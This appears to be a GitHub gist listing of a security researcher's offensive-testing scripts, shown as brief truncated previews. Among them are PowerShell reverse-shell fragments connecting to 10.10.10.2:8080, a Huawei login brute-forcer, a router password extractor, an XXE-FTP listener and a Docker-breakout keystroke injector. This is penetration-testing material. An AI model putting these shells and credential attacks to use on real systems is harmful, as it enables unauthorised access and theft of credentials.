Etienne Stalmans staaldraad
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
staaldraad
/ mmlBrute.py
Created
March 11, 2015 13:20
Brute force username/passwords for MML on Huawei devices. Default port 6000
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Brute-force tool to find the username/password for MML on a Huawei device. | |
| Author: Etienne Stalmans (etienne@sensepost.com) | |
| Version: 1.0 (14/01/2014) | |
| """ | |
| import sys | |
| import telnetlib |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do{ | |
| $writer.Write("> "); | |
| $writer.Flush(); | |
| $read = $null; |
staaldraad
/ uid_awk.sh
Created
December 12, 2017 14:06
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status |
staaldraad
/ huaweiPassExtract.py
Last active
May 19, 2023 11:00
Extract local users and passwords from Huawei router/firewall config
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Simple tool to extract local users and passwords from most Huawei routers/firewalls. | |
| Author: Etienne Stalmans (etienne@sensepost.com) | |
| Version: 1.0 (15/01/2014) | |
| """ | |
| import os | |
| import sys | |
| import argparse |
staaldraad
/ receivefile.ps1
Created
February 24, 2017 16:28
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080); | |
| if($socket -eq $null){ | |
| exit 1; | |
| } | |
| $socket.start(); | |
| $client = $socket.AcceptTcpClient(); | |
| $stream = $client.GetStream(); | |
| $buffer = new-object System.Byte[] 2048; | |
| $file = 'c:/afile.exe'; | |
| $fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env/python | |
| from __future__ import print_function | |
| import socket | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| s.bind(('0.0.0.0',2121)) | |
| s.listen(1) | |
| print('XXE-FTP listening ') | |
| conn,addr = s.accept() | |
| print('Connected by %s',addr) |
staaldraad
/ x11.py
Last active
August 28, 2022 05:09
Python script to do keystrokes via X11 abstract socket. Useful for silly docker breakout.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes. | |
| Created by: etienne@sensepost.com | |
| Credits to: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/x11/x11_keyboard_exec.rb | |
| Borrowed heavily from the original metasploit module. Thanks! | |
| """ | |
| from socket import * | |
| import subprocess |
staaldraad
/ ipconv.py
Last active
August 28, 2022 05:09
Quick script to generate different formats for a given IP address.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if len(sys.argv) < 2: | |
| print "Enter IP address as first argument: python %s 127.0.0.1"%sys.argv[0] | |
| sys.exit(1) | |
| ip = sys.argv[1] | |
| ips = ip.split('.') | |
| iph = '0x{:02X}.0x{:02X}.0x{:02X}.0x{:02X}'.format(*map(int, ips)) |
staaldraad
/ veripos_fuzz.py
Last active
June 30, 2022 17:49
Fuzz Verifone PoS terminals through exposed port
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env/python | |
| ''' | |
| Script for fuzzing verifone terminal/pos devices. This is a bad reverse-engineer and implementation of the official protocol: http://web.archive.org/web/20120603221525/http://www.verifone.com/PDF/guides/tcl_ref.pdf | |
| Should work fine. Official docs were only found after the initial implementation. Not fully tested with CRC-16 checksum correctly implemented. | |
| Author: etienne@sensepost.com | |
| Version: 1.0 | |
| License: GNU GENERAL PUBLIC LICENSE (GNU) Version 2 | |
| ''' |